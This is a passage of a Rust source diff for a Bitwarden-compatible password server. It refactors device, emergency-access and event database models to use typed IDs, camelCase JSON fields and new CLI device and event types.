+        // let orgowner: Vec<_> = members.iter().filter(|m| m.atype == 0).map(|o| o.org_uuid.clone()).collect();
+        // let orgadmin: Vec<_> = members.iter().filter(|m| m.atype == 1).map(|o| o.org_uuid.clone()).collect();
+        // let orguser: Vec<_> = members.iter().filter(|m| m.atype == 2).map(|o| o.org_uuid.clone()).collect();
+        // let orgmanager: Vec<_> = members.iter().filter(|m| m.atype == 3).map(|o| o.org_uuid.clone()).collect();
 
         // Create the JWT claims struct, to send to the client
         use crate::auth::{encode_jwt, LoginJwtClaims, DEFAULT_VALIDITY, JWT_LOGIN_ISSUER};
@@ -107,6 +135,8 @@ impl Device {
             // orgmanager,
             sstamp: user.security_stamp.clone(),
             device: self.uuid.clone(),
+            devicetype: DeviceType::from_i32(self.atype).to_string(),
+            client_id: client_id.unwrap_or("undefined".to_string()),
             scope,
             amr: vec!["Application".into()],
         };
@@ -118,11 +148,43 @@ impl Device {
         matches!(DeviceType::from_i32(self.atype), DeviceType::Android | DeviceType::Ios)
     }
 
-    pub fn is_registered(&self) -> bool {
-        self.push_uuid.is_some()
+    pub fn is_cli(&self) -> bool {
+        matches!(DeviceType::from_i32(self.atype), DeviceType::WindowsCLI | DeviceType::MacOsCLI | DeviceType::LinuxCLI)
     }
 }
 
+pub struct DeviceWithAuthRequest {
+    pub device: Device,
+    pub pending_auth_request: Option<AuthRequest>,
+}
+
+impl DeviceWithAuthRequest {
+    pub fn to_json(&self) -> Value {
+        let auth_request = match &self.pending_auth_request {
+            Some(auth_request) => auth_request.to_json_for_pending_device(),
+            None => Value::Null,
+        };
+        json!({
+            "id": self.device.uuid,
+            "name": self.device.name,
+            "type": self.device.atype,
+            "identifier": self.device.uuid,
+            "creationDate": format_date(&self.device.created_at),
+            "devicePendingAuthRequest": auth_request,
+            "isTrusted": false,
+            "encryptedPublicKey": null,
+            "encryptedUserKey": null,
+            "object": "device",
+        })
+    }
+
+    pub fn from(c: Device, a: Option<AuthRequest>) -> Self {
+        Self {
+            device: c,
+            pending_auth_request: a,
+        }
+    }
+}
 use crate::db::DbConn;
 
 use crate::api::EmptyResult;
@@ -150,7 +212,7 @@ impl Device {
         }
     }
 
-    pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
         db_run! { conn: {
             diesel::delete(devices::table.filter(devices::user_uuid.eq(user_uuid)))
                 .execute(conn)
@@ -158,7 +220,7 @@ impl Device {
         }}
     }
 
-    pub async fn find_by_uuid_and_user(uuid: &str, user_uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid_and_user(uuid: &DeviceId, user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
         db_run! { conn: {
             devices::table
                 .filter(devices::uuid.eq(uuid))
@@ -169,7 +231,17 @@ impl Device {
         }}
     }
 
-    pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_with_auth_request_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<DeviceWithAuthRequest> {
+        let devices = Self::find_by_user(user_uuid, conn).await;
+        let mut result = Vec::new();
+        for device in devices {
+            let auth_request = AuthRequest::find_by_user_and_requested_device(user_uuid, &device.uuid, conn).await;
+            result.push(DeviceWithAuthRequest::from(device, auth_request));
+        }
+        result
+    }
+
+    pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             devices::table
                 .filter(devices::user_uuid.eq(user_uuid))
@@ -179,7 +251,7 @@ impl Device {
         }}
     }
 
-    pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid(uuid: &DeviceId, conn: &mut DbConn) -> Option<Self> {
         db_run! { conn: {
             devices::table
                 .filter(devices::uuid.eq(uuid))
@@ -189,7 +261,7 @@ impl Device {
         }}
     }
 
-    pub async fn clear_push_token_by_uuid(uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn clear_push_token_by_uuid(uuid: &DeviceId, conn: &mut DbConn) -> EmptyResult {
         db_run! { conn: {
             diesel::update(devices::table)
                 .filter(devices::uuid.eq(uuid))
@@ -208,7 +280,7 @@ impl Device {
         }}
     }
 
-    pub async fn find_latest_active_by_user(user_uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_latest_active_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
         db_run! { conn: {
             devices::table
                 .filter(devices::user_uuid.eq(user_uuid))
@@ -219,7 +291,7 @@ impl Device {
         }}
     }
 
-    pub async fn find_push_devices_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_push_devices_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             devices::table
                 .filter(devices::user_uuid.eq(user_uuid))
@@ -230,7 +302,7 @@ impl Device {
         }}
     }
 
-    pub async fn check_user_has_push_device(user_uuid: &str, conn: &mut DbConn) -> bool {
+    pub async fn check_user_has_push_device(user_uuid: &UserId, conn: &mut DbConn) -> bool {
         db_run! { conn: {
             devices::table
                 .filter(devices::user_uuid.eq(user_uuid))
@@ -243,60 +315,60 @@ impl Device {
     }
 }
 
+#[derive(Display)]
 pub enum DeviceType {
+    #[display("Android")]
     Android = 0,
+    #[display("iOS")]
     Ios = 1,
+    #[display("Chrome Extension")]
     ChromeExtension = 2,
+    #[display("Firefox Extension")]
     FirefoxExtension = 3,
+    #[display("Opera Extension")]
     OperaExtension = 4,
+    #[display("Edge Extension")]
     EdgeExtension = 5,
+    #[display("Windows")]
     WindowsDesktop = 6,
+    #[display("macOS")]
     MacOsDesktop = 7,
+    #[display("Linux")]
     LinuxDesktop = 8,
+    #[display("Chrome")]
     ChromeBrowser = 9,
+    #[display("Firefox")]
     FirefoxBrowser = 10,
+    #[display("Opera")]
     OperaBrowser = 11,
+    #[display("Edge")]
     EdgeBrowser = 12,
+    #[display("Internet Explorer")]
     IEBrowser = 13,
+    #[display("Unknown Browser")]
     UnknownBrowser = 14,
+    #[display("Android")]
     AndroidAmazon = 15,
+    #[display("UWP")]
     Uwp = 16,
+    #[display("Safari")]
     SafariBrowser = 17,
+    #[display("Vivaldi")]
     VivaldiBrowser = 18,
+    #[display("Vivaldi Extension")]
     VivaldiExtension = 19,
+    #[display("Safari Extension")]
     SafariExtension = 20,
+    #[display("SDK")]
     Sdk = 21,
+    #[display("Server")]
     Server = 22,
-}
-
-impl fmt::Display for DeviceType {
-    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
-        match self {
-            DeviceType::Android => write!(f, "Android"),
-            DeviceType::Ios => write!(f, "iOS"),
-            DeviceType::ChromeExtension => write!(f, "Chrome Extension"),
-            DeviceType::FirefoxExtension => write!(f, "Firefox Extension"),
-            DeviceType::OperaExtension => write!(f, "Opera Extension"),
-            DeviceType::EdgeExtension => write!(f, "Edge Extension"),
-            DeviceType::WindowsDesktop => write!(f, "Windows Desktop"),
-            DeviceType::MacOsDesktop => write!(f, "MacOS Desktop"),
-            DeviceType::LinuxDesktop => write!(f, "Linux Desktop"),
-            DeviceType::ChromeBrowser => write!(f, "Chrome Browser"),
-            DeviceType::FirefoxBrowser => write!(f, "Firefox Browser"),
-            DeviceType::OperaBrowser => write!(f, "Opera Browser"),
-            DeviceType::EdgeBrowser => write!(f, "Edge Browser"),
-            DeviceType::IEBrowser => write!(f, "Internet Explorer"),
-            DeviceType::UnknownBrowser => write!(f, "Unknown Browser"),
-            DeviceType::AndroidAmazon => write!(f, "Android Amazon"),
-            DeviceType::Uwp => write!(f, "UWP"),
-            DeviceType::SafariBrowser => write!(f, "Safari Browser"),
-            DeviceType::VivaldiBrowser => write!(f, "Vivaldi Browser"),
-            DeviceType::VivaldiExtension => write!(f, "Vivaldi Extension"),
-            DeviceType::SafariExtension => write!(f, "Safari Extension"),
-            DeviceType::Sdk => write!(f, "SDK"),
-            DeviceType::Server => write!(f, "Server"),
-        }
-    }
+    #[display("Windows CLI")]
+    WindowsCLI = 23,
+    #[display("macOS CLI")]
+    MacOsCLI = 24,
+    #[display("Linux CLI")]
+    LinuxCLI = 25,
 }
 
 impl DeviceType {
@@ -325,7 +397,18 @@ impl DeviceType {
             20 => DeviceType::SafariExtension,
             21 => DeviceType::Sdk,
             22 => DeviceType::Server,
+            23 => DeviceType::WindowsCLI,
+            24 => DeviceType::MacOsCLI,
+            25 => DeviceType::LinuxCLI,
             _ => DeviceType::UnknownBrowser,
         }
     }
 }
+
+#[derive(
+    Clone, Debug, DieselNewType, Display, From, FromForm, Hash, PartialEq, Eq, Serialize, Deserialize, IdFromParam,
+)]
+pub struct DeviceId(String);
+
+#[derive(Clone, Debug, DieselNewType, Display, From, FromForm, Serialize, Deserialize, UuidFromParam)]
+pub struct PushId(pub String);
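The hand-written `impl fmt::Display for DeviceType` removed above is replaced by `derive_more`'s `Display` derive with a `#[display(...)]` attribute per variant. A trimmed, runnable sketch of the same idea (assuming `derive_more` 1.x with the `display` feature, which the `#[display("...")]` attribute syntax in the diff implies; the variant set is cut down for brevity):

```rust
use derive_more::Display;

// The display string lives next to the variant it names, so adding a new
// device type (e.g. the CLI variants 23-25 above) cannot drift out of sync
// with a separately maintained match arm.
#[derive(Display)]
pub enum DeviceType {
    #[display("Android")]
    Android = 0,
    #[display("iOS")]
    Ios = 1,
    #[display("Windows CLI")]
    WindowsCLI = 23,
}

fn main() {
    assert_eq!(DeviceType::Ios.to_string(), "iOS");
    assert_eq!(DeviceType::WindowsCLI.to_string(), "Windows CLI");
}
```

For the variants shown, `to_string()` behaves identically to the removed match-based implementation.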
diff --git a/src/db/models/emergency_access.rs b/src/db/models/emergency_access.rs
@@ -1,9 +1,10 @@
 use chrono::{NaiveDateTime, Utc};
+use derive_more::{AsRef, Deref, Display, From};
 use serde_json::Value;
 
+use super::{User, UserId};
 use crate::{api::EmptyResult, db::DbConn, error::MapResult};
-use super::User;
+use macros::UuidFromParam;
 
 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
@@ -11,9 +12,9 @@ db_object! {
     #[diesel(treat_none_as_null = true)]
     #[diesel(primary_key(uuid))]
     pub struct EmergencyAccess {
-        pub uuid: String,
-        pub grantor_uuid: String,
-        pub grantee_uuid: Option<String>,
+        pub uuid: EmergencyAccessId,
+        pub grantor_uuid: UserId,
+        pub grantee_uuid: Option<UserId>,
         pub email: Option<String>,
         pub key_encrypted: Option<String>,
         pub atype: i32, //EmergencyAccessType
@@ -26,14 +27,14 @@ db_object! {
     }
 }
 
-/// Local methods
+// Local methods
 
 impl EmergencyAccess {
-    pub fn new(grantor_uuid: String, email: String, status: i32, atype: i32, wait_time_days: i32) -> Self {
+    pub fn new(grantor_uuid: UserId, email: String, status: i32, atype: i32, wait_time_days: i32) -> Self {
         let now = Utc::now().naive_utc();
 
         Self {
-            uuid: crate::util::get_uuid(),
+            uuid: EmergencyAccessId(crate::util::get_uuid()),
             grantor_uuid,
             grantee_uuid: None,
             email: Some(email),
@@ -58,11 +59,11 @@ impl EmergencyAccess {
 
     pub fn to_json(&self) -> Value {
         json!({
-            "Id": self.uuid,
-            "Status": self.status,
-            "Type": self.atype,
-            "WaitTimeDays": self.wait_time_days,
-            "Object": "emergencyAccess",
+            "id": self.uuid,
+            "status": self.status,
+            "type": self.atype,
+            "waitTimeDays": self.wait_time_days,
+            "object": "emergencyAccess",
         })
     }
 
@@ -70,36 +71,45 @@ impl EmergencyAccess {
         let grantor_user = User::find_by_uuid(&self.grantor_uuid, conn).await.expect("Grantor user not found.");
 
         json!({
-            "Id": self.uuid,
-            "Status": self.status,
-            "Type": self.atype,
-            "WaitTimeDays": self.wait_time_days,
-            "GrantorId": grantor_user.uuid,
-            "Email": grantor_user.email,
-            "Name": grantor_user.name,
-            "Object": "emergencyAccessGrantorDetails",
+            "id": self.uuid,
+            "status": self.status,
+            "type": self.atype,
+            "waitTimeDays": self.wait_time_days,
+            "grantorId": grantor_user.uuid,
+            "email": grantor_user.email,
+            "name": grantor_user.name,
+            "avatarColor": grantor_user.avatar_color,
+            "object": "emergencyAccessGrantorDetails",
         })
     }
 
-    pub async fn to_json_grantee_details(&self, conn: &mut DbConn) -> Value {
-        let grantee_user = if let Some(grantee_uuid) = self.grantee_uuid.as_deref() {
-            Some(User::find_by_uuid(grantee_uuid, conn).await.expect("Grantee user not found."))
+    pub async fn to_json_grantee_details(&self, conn: &mut DbConn) -> Option<Value> {
+        let grantee_user = if let Some(grantee_uuid) = &self.grantee_uuid {
+            User::find_by_uuid(grantee_uuid, conn).await.expect("Grantee user not found.")
         } else if let Some(email) = self.email.as_deref() {
-            Some(User::find_by_mail(email, conn).await.expect("Grantee user not found."))
+            match User::find_by_mail(email, conn).await {
+                Some(user) => user,
+                None => {
+                    // remove outstanding invitations which should not exist
+                    Self::delete_all_by_grantee_email(email, conn).await.ok();
+                    return None;
+                }
+            }
         } else {
-            None
+            return None;
         };
 
-        json!({
-            "Id": self.uuid,
-            "Status": self.status,
-            "Type": self.atype,
-            "WaitTimeDays": self.wait_time_days,
-            "GranteeId": grantee_user.as_ref().map_or("", |u| &u.uuid),
-            "Email": grantee_user.as_ref().map_or("", |u| &u.email),
-            "Name": grantee_user.as_ref().map_or("", |u| &u.name),
-            "Object": "emergencyAccessGranteeDetails",
-        })
+        Some(json!({
+            "id": self.uuid,
+            "status": self.status,
+            "type": self.atype,
+            "waitTimeDays": self.wait_time_days,
+            "granteeId": grantee_user.uuid,
+            "email": grantee_user.email,
+            "name": grantee_user.name,
+            "avatarColor": grantee_user.avatar_color,
+            "object": "emergencyAccessGranteeDetails",
        }))
     }
 }
 
@@ -174,7 +184,7 @@ impl EmergencyAccess {
         // Update the grantee so that it will refresh it's status.
         User::update_uuid_revision(self.grantee_uuid.as_ref().expect("Error getting grantee"), conn).await;
         self.status = status;
-        self.updated_at = date.to_owned();
+        date.clone_into(&mut self.updated_at);
 
         db_run! {conn: {
             crate::util::retry(|| {
@@ -192,7 +202,7 @@ impl EmergencyAccess {
         conn: &mut DbConn,
     ) -> EmptyResult {
         self.last_notification_at = Some(date.to_owned());
-        self.updated_at = date.to_owned();
+        date.clone_into(&mut self.updated_at);
 
         db_run! {conn: {
             crate::util::retry(|| {
@@ -204,7 +214,7 @@ impl EmergencyAccess {
         }}
     }
 
-    pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
         for ea in Self::find_all_by_grantor_uuid(user_uuid, conn).await {
             ea.delete(conn).await?;
         }
@@ -214,6 +224,13 @@ impl EmergencyAccess {
         Ok(())
     }
 
+    pub async fn delete_all_by_grantee_email(grantee_email: &str, conn: &mut DbConn) -> EmptyResult {
+        for ea in Self::find_all_invited_by_grantee_email(grantee_email, conn).await {
+            ea.delete(conn).await?;
+        }
+        Ok(())
+    }
+
     pub async fn delete(self, conn: &mut DbConn) -> EmptyResult {
         User::update_uuid_revision(&self.grantor_uuid, conn).await;
 
@@ -224,18 +241,9 @@ impl EmergencyAccess {
         }}
     }
 
-    pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
-        db_run! { conn: {
-            emergency_access::table
-                .filter(emergency_access::uuid.eq(uuid))
-                .first::<EmergencyAccessDb>(conn)
-                .ok().from_db()
-        }}
-    }
-
     pub async fn find_by_grantor_uuid_and_grantee_uuid_or_email(
-        grantor_uuid: &str,
-        grantee_uuid: &str,
+        grantor_uuid: &UserId,
+        grantee_uuid: &UserId,
         email: &str,
         conn: &mut DbConn,
     ) -> Option<Self> {
@@ -257,7 +265,11 @@ impl EmergencyAccess {
         }}
     }
 
-    pub async fn find_by_uuid_and_grantor_uuid(uuid: &str, grantor_uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid_and_grantor_uuid(
+        uuid: &EmergencyAccessId,
+        grantor_uuid: &UserId,
+        conn: &mut DbConn,
+    ) -> Option<Self> {
         db_run! { conn: {
             emergency_access::table
                 .filter(emergency_access::uuid.eq(uuid))
@@ -267,7 +279,35 @@ impl EmergencyAccess {
         }}
     }
 
-    pub async fn find_all_by_grantee_uuid(grantee_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_uuid_and_grantee_uuid(
+        uuid: &EmergencyAccessId,
+        grantee_uuid: &UserId,
+        conn: &mut DbConn,
+    ) -> Option<Self> {
+        db_run! { conn: {
+            emergency_access::table
+                .filter(emergency_access::uuid.eq(uuid))
+                .filter(emergency_access::grantee_uuid.eq(grantee_uuid))
+                .first::<EmergencyAccessDb>(conn)
+                .ok().from_db()
+        }}
+    }
+
+    pub async fn find_by_uuid_and_grantee_email(
+        uuid: &EmergencyAccessId,
+        grantee_email: &str,
+        conn: &mut DbConn,
+    ) -> Option<Self> {
+        db_run! { conn: {
+            emergency_access::table
+                .filter(emergency_access::uuid.eq(uuid))
+                .filter(emergency_access::email.eq(grantee_email))
+                .first::<EmergencyAccessDb>(conn)
+                .ok().from_db()
+        }}
+    }
+
+    pub async fn find_all_by_grantee_uuid(grantee_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             emergency_access::table
                 .filter(emergency_access::grantee_uuid.eq(grantee_uuid))
@@ -285,13 +325,60 @@ impl EmergencyAccess {
         }}
     }
 
-    pub async fn find_all_by_grantor_uuid(grantor_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_all_invited_by_grantee_email(grantee_email: &str, conn: &mut DbConn) -> Vec<Self> {
+        db_run! { conn: {
+            emergency_access::table
+                .filter(emergency_access::email.eq(grantee_email))
+                .filter(emergency_access::status.eq(EmergencyAccessStatus::Invited as i32))
+                .load::<EmergencyAccessDb>(conn).expect("Error loading emergency_access").from_db()
+        }}
+    }
+
+    pub async fn find_all_by_grantor_uuid(grantor_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             emergency_access::table
                 .filter(emergency_access::grantor_uuid.eq(grantor_uuid))
                 .load::<EmergencyAccessDb>(conn).expect("Error loading emergency_access").from_db()
         }}
     }
+
+    pub async fn accept_invite(
+        &mut self,
+        grantee_uuid: &UserId,
+        grantee_email: &str,
+        conn: &mut DbConn,
+    ) -> EmptyResult {
+        if self.email.is_none() || self.email.as_ref().unwrap() != grantee_email {
+            err!("User email does not match invite.");
+        }
+
+        if self.status == EmergencyAccessStatus::Accepted as i32 {
+            err!("Emergency contact already accepted.");
+        }
+
+        self.status = EmergencyAccessStatus::Accepted as i32;
+        self.grantee_uuid = Some(grantee_uuid.clone());
+        self.email = None;
+        self.save(conn).await
+    }
 }
 
 // endregion
 
+#[derive(
+    Clone,
+    Debug,
+    AsRef,
+    Deref,
+    DieselNewType,
+    Display,
+    From,
+    FromForm,
+    Hash,
+    PartialEq,
+    Eq,
+    Serialize,
+    Deserialize,
+    UuidFromParam,
+)]
+pub struct EmergencyAccessId(String);
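One small but recurring change in this file: `self.updated_at = date.to_owned()` becomes `date.clone_into(&mut self.updated_at)`. `ToOwned::clone_into` may reuse the destination's existing allocation instead of building a fresh clone and dropping the old value. A standalone sketch of the difference, using `String` where the reuse is visible (for plain `Copy`-like timestamps the two forms behave the same):

```rust
fn main() {
    let src = "2025-01-01 00:00:00";
    let mut dst = String::with_capacity(32);

    // `dst = src.to_owned()` would allocate a new String and drop the old one;
    // `clone_into` can write into dst's existing buffer instead.
    src.clone_into(&mut dst);
    assert_eq!(dst, src);
}
```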
diff --git a/src/db/models/event.rs b/src/db/models/event.rs
@@ -1,41 +1,42 @@
-use crate::db::DbConn;
+use chrono::{NaiveDateTime, TimeDelta, Utc};
+//use derive_more::{AsRef, Deref, Display, From};
 use serde_json::Value;
 
-use crate::{api::EmptyResult, error::MapResult, CONFIG};
-use chrono::{Duration, NaiveDateTime, Utc};
+use super::{CipherId, CollectionId, GroupId, MembershipId, OrgPolicyId, OrganizationId, UserId};
+use crate::{api::EmptyResult, db::DbConn, error::MapResult, CONFIG};
 
 // https://bitwarden.com/help/event-logs/
 
 db_object! {
-    // Upstream: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Services/Implementations/EventService.cs
-    // Upstream: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Api/Models/Public/Response/EventResponseModel.cs
-    // Upstream SQL: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Sql/dbo/Tables/Event.sql
+    // Upstream: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Services/Implementations/EventService.cs
+    // Upstream: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/AdminConsole/Public/Models/Response/EventResponseModel.cs
+    // Upstream SQL: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Sql/dbo/Tables/Event.sql
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
     #[diesel(table_name = event)]
+    #[diesel(treat_none_as_null = true)]
     #[diesel(primary_key(uuid))]
     pub struct Event {
-        pub uuid: String,
+        pub uuid: EventId,
         pub event_type: i32, // EventType
-        pub user_uuid: Option<String>,
-        pub org_uuid: Option<String>,
-        pub cipher_uuid: Option<String>,
-        pub collection_uuid: Option<String>,
-        pub group_uuid: Option<String>,
-        pub org_user_uuid: Option<String>,
-        pub act_user_uuid: Option<String>,
-        // Upstream enum: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Enums/DeviceType.cs
+        pub user_uuid: Option<UserId>,
+        pub org_uuid: Option<OrganizationId>,
+        pub cipher_uuid: Option<CipherId>,
+        pub collection_uuid: Option<CollectionId>,
+        pub group_uuid: Option<GroupId>,
+        pub org_user_uuid: Option<MembershipId>,
+        pub act_user_uuid: Option<UserId>,
+        // Upstream enum: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/Enums/DeviceType.cs
         pub device_type: Option<i32>,
         pub ip_address: Option<String>,
         pub event_date: NaiveDateTime,
-        pub policy_uuid: Option<String>,
+        pub policy_uuid: Option<OrgPolicyId>,
         pub provider_uuid: Option<String>,
         pub provider_user_uuid: Option<String>,
         pub provider_org_uuid: Option<String>,
     }
 }
 
-// Upstream enum: https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Enums/EventType.cs
+// Upstream enum: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Enums/EventType.cs
 #[derive(Debug, Copy, Clone)]
 pub enum EventType {
     // User
@@ -49,6 +50,8 @@ pub enum EventType {
     UserClientExportedVault = 1007,
     // UserUpdatedTempPassword = 1008, // Not supported
     // UserMigratedKeyToKeyConnector = 1009, // Not supported
+    UserRequestedDeviceApproval = 1010,
+    // UserTdeOffboardingPasswordSet = 1011, // Not supported
 
     // Cipher
     CipherCreated = 1100,
@@ -84,7 +87,7 @@ pub enum EventType {
     OrganizationUserInvited = 1500,
     OrganizationUserConfirmed = 1501,
     OrganizationUserUpdated = 1502,
-    OrganizationUserRemoved = 1503,
+    OrganizationUserRemoved = 1503, // Organization user data was deleted
     OrganizationUserUpdatedGroups = 1504,
     // OrganizationUserUnlinkedSso = 1505, // Not supported
     OrganizationUserResetPasswordEnroll = 1506,
@@ -94,6 +97,10 @@ pub enum EventType {
     // OrganizationUserFirstSsoLogin = 1510, // Not supported
|
// OrganizationUserFirstSsoLogin = 1510, // Not supported
|
||||||
OrganizationUserRevoked = 1511,
|
OrganizationUserRevoked = 1511,
|
||||||
OrganizationUserRestored = 1512,
|
OrganizationUserRestored = 1512,
|
||||||
|
OrganizationUserApprovedAuthRequest = 1513,
|
||||||
|
OrganizationUserRejectedAuthRequest = 1514,
|
||||||
|
OrganizationUserDeleted = 1515, // Both user and organization user data were deleted
|
||||||
|
OrganizationUserLeft = 1516, // User voluntarily left the organization
|
||||||
|
|
||||||
// Organization
|
// Organization
|
||||||
OrganizationUpdated = 1600,
|
OrganizationUpdated = 1600,
|
||||||
@@ -105,6 +112,7 @@ pub enum EventType {
|
|||||||
// OrganizationEnabledKeyConnector = 1606, // Not supported
|
// OrganizationEnabledKeyConnector = 1606, // Not supported
|
||||||
// OrganizationDisabledKeyConnector = 1607, // Not supported
|
// OrganizationDisabledKeyConnector = 1607, // Not supported
|
||||||
// OrganizationSponsorshipsSynced = 1608, // Not supported
|
// OrganizationSponsorshipsSynced = 1608, // Not supported
|
||||||
|
// OrganizationCollectionManagementUpdated = 1609, // Not supported
|
||||||
|
|
||||||
// Policy
|
// Policy
|
||||||
PolicyUpdated = 1700,
|
PolicyUpdated = 1700,
|
||||||
@@ -117,6 +125,13 @@ pub enum EventType {
|
|||||||
// ProviderOrganizationAdded = 1901, // Not supported
|
// ProviderOrganizationAdded = 1901, // Not supported
|
||||||
// ProviderOrganizationRemoved = 1902, // Not supported
|
// ProviderOrganizationRemoved = 1902, // Not supported
|
||||||
// ProviderOrganizationVaultAccessed = 1903, // Not supported
|
// ProviderOrganizationVaultAccessed = 1903, // Not supported
|
||||||
|
|
||||||
|
// OrganizationDomainAdded = 2000, // Not supported
|
||||||
|
// OrganizationDomainRemoved = 2001, // Not supported
|
||||||
|
// OrganizationDomainVerified = 2002, // Not supported
|
||||||
|
// OrganizationDomainNotVerified = 2003, // Not supported
|
||||||
|
|
||||||
|
// SecretRetrieved = 2100, // Not supported
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
@@ -128,7 +143,7 @@ impl Event {
|
|||||||
};
|
};
|
||||||
|
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: EventId(crate::util::get_uuid()),
|
||||||
event_type,
|
event_type,
|
||||||
user_uuid: None,
|
user_uuid: None,
|
||||||
org_uuid: None,
|
org_uuid: None,
|
||||||
@@ -172,7 +187,7 @@ impl Event {
|
|||||||
}
|
}
|
||||||
|
|
||||||
/// Database methods
|
/// Database methods
|
||||||
/// https://github.com/bitwarden/server/blob/8a22c0479e987e756ce7412c48a732f9002f0a2d/src/Core/Services/Implementations/EventService.cs
|
/// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Services/Implementations/EventService.cs
|
||||||
impl Event {
|
impl Event {
|
||||||
pub const PAGE_SIZE: i64 = 30;
|
pub const PAGE_SIZE: i64 = 30;
|
||||||
|
|
||||||
@@ -246,7 +261,7 @@ impl Event {
|
|||||||
/// ##############
|
/// ##############
|
||||||
/// Custom Queries
|
/// Custom Queries
|
||||||
pub async fn find_by_organization_uuid(
|
pub async fn find_by_organization_uuid(
|
||||||
org_uuid: &str,
|
org_uuid: &OrganizationId,
|
||||||
start: &NaiveDateTime,
|
start: &NaiveDateTime,
|
||||||
end: &NaiveDateTime,
|
end: &NaiveDateTime,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
@@ -263,7 +278,7 @@ impl Event {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn count_by_org(org_uuid: &str, conn: &mut DbConn) -> i64 {
|
pub async fn count_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
event::table
|
event::table
|
||||||
.filter(event::org_uuid.eq(org_uuid))
|
.filter(event::org_uuid.eq(org_uuid))
|
||||||
@@ -274,16 +289,16 @@ impl Event {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_org_and_user_org(
|
pub async fn find_by_org_and_member(
|
||||||
org_uuid: &str,
|
org_uuid: &OrganizationId,
|
||||||
user_org_uuid: &str,
|
member_uuid: &MembershipId,
|
||||||
start: &NaiveDateTime,
|
start: &NaiveDateTime,
|
||||||
end: &NaiveDateTime,
|
end: &NaiveDateTime,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Vec<Self> {
|
) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
event::table
|
event::table
|
||||||
.inner_join(users_organizations::table.on(users_organizations::uuid.eq(user_org_uuid)))
|
.inner_join(users_organizations::table.on(users_organizations::uuid.eq(member_uuid)))
|
||||||
.filter(event::org_uuid.eq(org_uuid))
|
.filter(event::org_uuid.eq(org_uuid))
|
||||||
.filter(event::event_date.between(start, end))
|
.filter(event::event_date.between(start, end))
|
||||||
.filter(event::user_uuid.eq(users_organizations::user_uuid.nullable()).or(event::act_user_uuid.eq(users_organizations::user_uuid.nullable())))
|
.filter(event::user_uuid.eq(users_organizations::user_uuid.nullable()).or(event::act_user_uuid.eq(users_organizations::user_uuid.nullable())))
|
||||||
@@ -297,7 +312,7 @@ impl Event {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_cipher_uuid(
|
pub async fn find_by_cipher_uuid(
|
||||||
cipher_uuid: &str,
|
cipher_uuid: &CipherId,
|
||||||
start: &NaiveDateTime,
|
start: &NaiveDateTime,
|
||||||
end: &NaiveDateTime,
|
end: &NaiveDateTime,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
@@ -316,7 +331,7 @@ impl Event {
|
|||||||
|
|
||||||
pub async fn clean_events(conn: &mut DbConn) -> EmptyResult {
|
pub async fn clean_events(conn: &mut DbConn) -> EmptyResult {
|
||||||
